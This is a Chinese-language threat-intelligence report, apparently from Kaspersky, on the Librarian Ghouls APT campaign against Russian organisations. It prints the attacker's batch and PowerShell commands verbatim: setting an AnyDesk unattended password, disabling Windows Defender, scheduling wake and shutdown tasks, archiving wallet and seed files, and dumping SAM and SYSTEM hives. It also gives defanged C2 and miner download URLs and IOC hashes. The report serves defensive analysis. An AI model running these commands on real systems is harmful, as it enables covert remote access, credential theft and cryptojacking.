技术细节

初始感染途径

Librarian Ghouls（又称"Rare Werewolf"和"Rezet"）是一个主要针对俄罗斯及独联体国家实体的APT组织。该组织在2024年持续活跃，攻击活动在12月略有减少后立即出现新一波攻击浪潮。

攻击者主要通过包含带密码保护压缩包（内含可执行文件）的定向钓鱼邮件进行初始感染。这些恶意邮件通常伪装成合法组织的消息，附件看似官方文档。感染过程为：受害者打开附件压缩包（密码通常在邮件正文中提供），解压内部文件并打开。

我们获取到一个伪装成付款订单的恶意植入物样本。该样本是使用Windows的Smart Install Maker工具制作的自解压安装程序。

安装程序包含三个文件：压缩包、配置文件和与分析无关的空文件。这些文件随后分别重命名为data.cab、installer.config和runtime.cab。

主要恶意逻辑位于安装程序的配置文件中。它使用各种注册表修改命令自动在系统上部署合法的窗口管理软件4t Tray Minimizer。该软件可将运行中的应用最小化到系统托盘，使攻击者能够隐藏其在受感染系统上的存在。

安装4t Tray Minimizer后，安装程序从data.cab提取三个文件到C:\Intel目录：

PDF诱饵模仿小额付款订单。

rezet.cmd

data.cab解压后，安装程序生成并执行rezet.cmd命令文件，该文件随后连接到C2服务器downdown[.]ru，托管六个JPG扩展名文件。rezet.cmd将这些文件下载到C:\Intel，并更改文件扩展名为：driver.exe、blat.exe、svchost.exe、Trays.rar、wol.ps1和dc.exe。

• driver.exe是定制版本的rar.exe（WinRAR 3.80控制台版本），移除了用户对话框字符串：可执行命令但不在控制台提供有意义的输出
• blat.exe是Blat，用于通过SMTP发送电子邮件和文件的合法实用程序
• svchost.exe是远程访问应用AnyDesk
• dc.exe是Defender Control，可用于禁用Windows Defender

下载文件后，脚本使用指定密码和driver.exe控制台实用程序将Trays.rar解压到同一C:\Intel目录，并运行解压的Trays.lnk。此快捷方式允许启动4t Tray Minimizer并最小化到托盘。

随后，脚本在受感染设备上安装AnyDesk，并从C2服务器下载bat.bat文件到C:\Intel\AnyDesk。最后，rezet.cmd运行之前从data.cab提取的bat.lnk。

bat.bat

打开bat.lnk快捷方式会运行bat.bat批处理文件，执行一系列恶意操作。

禁用安全措施和计划任务

BAT文件首先为AnyDesk设置密码QWERTY1234566，允许攻击者无需确认即可连接到受害者设备。

接着，脚本使用之前下载的Defender Control（dc.exe）应用禁用Windows Defender。

为验证受害者计算机开机且可用于远程连接，批处理文件使用不同参数运行powercfg实用程序六次。该实用程序控制本地机器的电源设置。

随后，bat.bat运行schtasks实用程序创建ShutdownAt5AM计划任务，每天凌晨5点关闭受害者PC。我们评估认为攻击者使用此技术掩盖痕迹，使用户不知设备已被劫持。

1
2
3
4
5
6
7
8
9

echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

唤醒脚本和数据窃取

批处理文件随后通过PowerShell执行wol.ps1脚本。

1
2
3
4
5
6
7

$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

该脚本每天凌晨1点启动Microsoft Edge。我们未发现msedge.exe被替换或破坏的证据，认为它是正版Microsoft Edge可执行文件。每日浏览器激活会唤醒受害者计算机，为攻击者提供4小时窗口，在计划任务凌晨5点关闭机器前建立未经授权的AnyDesk远程访问。

执行PowerShell脚本后，bat.bat移除curl实用程序、Trays.rar压缩包和AnyDesk安装程序。攻击者不再需要这些组件：感染此阶段，所有必要的恶意文件和第三方实用程序已通过curl下载，Trays.rar已解压，AnyDesk已安装在设备上。

随后，批处理文件为Blat设置环境变量。这些变量包含受害者数据将发送到的电子邮件地址及这些账户的密码。

下一步是收集设备上攻击者感兴趣的信息：

• 加密货币钱包凭据和种子短语
• 使用reg.exe制作的HKLM\SAM和HKLM\SYSTEM注册表键转储

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup

BAT文件使用driver.exe将收集的数据打包到两个单独的密码保护压缩包中。随后，脚本运行blat.exe通过SMTP将受害者数据和AnyDesk配置文件发送给攻击者。

矿机安装和自删除

接下来，bat.bat从C:\Intel\文件夹删除攻击期间生成的文件，并在受感染系统上安装加密货币矿机。为此，脚本创建包含矿池地址和攻击者标识符的bm.json配置文件，然后从hxxp://bmapps[.]org/bmcontrol/win64/Install.exe下载install.exe。

install.exe是一个安装程序，检查系统中的JSON配置文件和bmcontrol.exe进程。如果检测到进程，安装程序会终止它。

随后，install.exe从hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip下载包含挖矿工具的压缩包。

压缩包包含以下文件：

• _install.exe：安装程序的新版本（分析样本相同，但怀疑攻击者有更新恶意软件的场景）
• bmcontrol.exe：矿机控制器
• run.exe、stop.cmd、uninstall.cmd：启动、停止和移除控制器的工具
• XMRig矿机

根据JSON文件的参数，使用未修改的原始安装程序文件，或将_install.exe重命名为install.exe并运行。之后，安装程序将run.exe添加到自启动。该实用程序检查受感染系统上是否已运行bmcontrol.exe控制器，如果未找到，则从下载的压缩包运行它。

运行后，bmcontrol.exe创建两个进程：master和worker。master进程启动并持续监控worker，并在意外退出时重新启动它。此外，master将JSON配置文件传递给worker进程。

在启动XMRig矿机前，worker进程收集以下系统信息：

• 可用CPU核心
• 可用RAM
• GPU

这些数据用于在受感染设备上配置矿机，并发送到攻击者的服务器。XMRig运行时，worker维持与矿池的连接，每60秒发送一次请求。

在系统上安装矿机后，bat.bat从受害者设备中移除自身。

攻击者使用的合法软件

利用第三方合法软件实现恶意目的（T1588.002）是常见技术，使APT活动检测和归因更加困难。我们在当前各种APT组织（特别是Likho集群）的活动中看到了这种模式。

除上述实用程序外，我们还确定了Librarian Ghouls攻击中使用的以下软件：

• Mipko Personal Monitor：攻击者用于监控受害者的DLP系统，可收集屏幕截图和记录击键等
• WebBrowserPassView：可从网页浏览器提取存储密码的密码恢复实用程序
• ngrok：保护和加速网络服务的全局反向代理，用于连接到目标机器
• NirCmd：促进各种OS任务且无可见用户界面的合法实用程序，用于隐蔽运行脚本和可执行文件

网络钓鱼活动

调查揭示了几个我们评估与正在进行的Librarian Ghouls活动相关的域名。调查时，其中一些仍处于活跃状态，包括users-mail[.]ru和deauthorization[.]online。这些域名托管使用PHP脚本生成的钓鱼页面，旨在获取mail.ru电子邮件服务的凭据。

基础设施

本文详述的植入物与命令控制服务器downdown[.]ru和dragonfires[.]ru通信。两者均解析到IP地址185.125.51[.]5。

对攻击者基础设施的分析揭示了一个显著特征：与此活动相关的几个恶意Web服务器启用了目录列表，允许我们检查它们存储的文件。

受害者

我们的遥测数据显示，调查期间数百名俄罗斯用户成为此活动的受害者。主要针对工业企业，工程学校也是关注目标。此外，所述攻击还影响了白俄罗斯和哈萨克斯坦的用户。

钓鱼邮件明显用俄语撰写，包含带有俄语文件名的压缩包以及俄语诱饵文档。这表明此活动的主要目标可能基于俄罗斯或讲俄语。

关于攻击者

Librarian Ghouls APT表现出通常与黑客行动主义团体相关的特征，例如使用自解压压缩包和依赖合法第三方实用程序而非自定义恶意软件二进制模块。

自2024年12月当前活动开始以来，我们看到植入物频繁更新，配置文件和捆绑的合法实用程序集各不相同。发布时，我们的数据包含100多个与此活动相关的恶意文件。

要点

本报告发布时，所述的Librarian Ghouls APT活动仍然活跃，2025年5月观察到的攻击即为证据。与先前活动一致，攻击者利用第三方合法实用程序而非开发自定义工具。所有恶意功能仍依赖安装程序、命令和PowerShell脚本。我们观察到攻击者不断改进策略，不仅包括数据渗出，还包括部署远程访问工具和使用钓鱼站点进行电子邮件账户入侵。我们持续监控此威胁行为体，并将继续分享其活动的最新信息。

危害指标（IOC）

• 其他危害指标和检测Librarian Ghouls活动的YARA规则可供我们的APT情报报告服务客户使用。请联系intelreports@kaspersky.com获取更多详情。

植入物

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68 2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617 785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351 53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04

植入物配置文件

f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f 4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72 1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06 7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a 702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090 311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca

恶意压缩包附件

fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86 6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74

恶意BAT文件

e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9 c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968 636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748 c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72 8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073 2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f

诱饵文档

cab1c4c675f1d996b659bab1ddb38af365190e450dec3d195461e4e4ccf1c286 dfac7cd8d041a53405cc37a44f100f6f862ed2d930e251f4bf22f10235db4bb3 977054802de7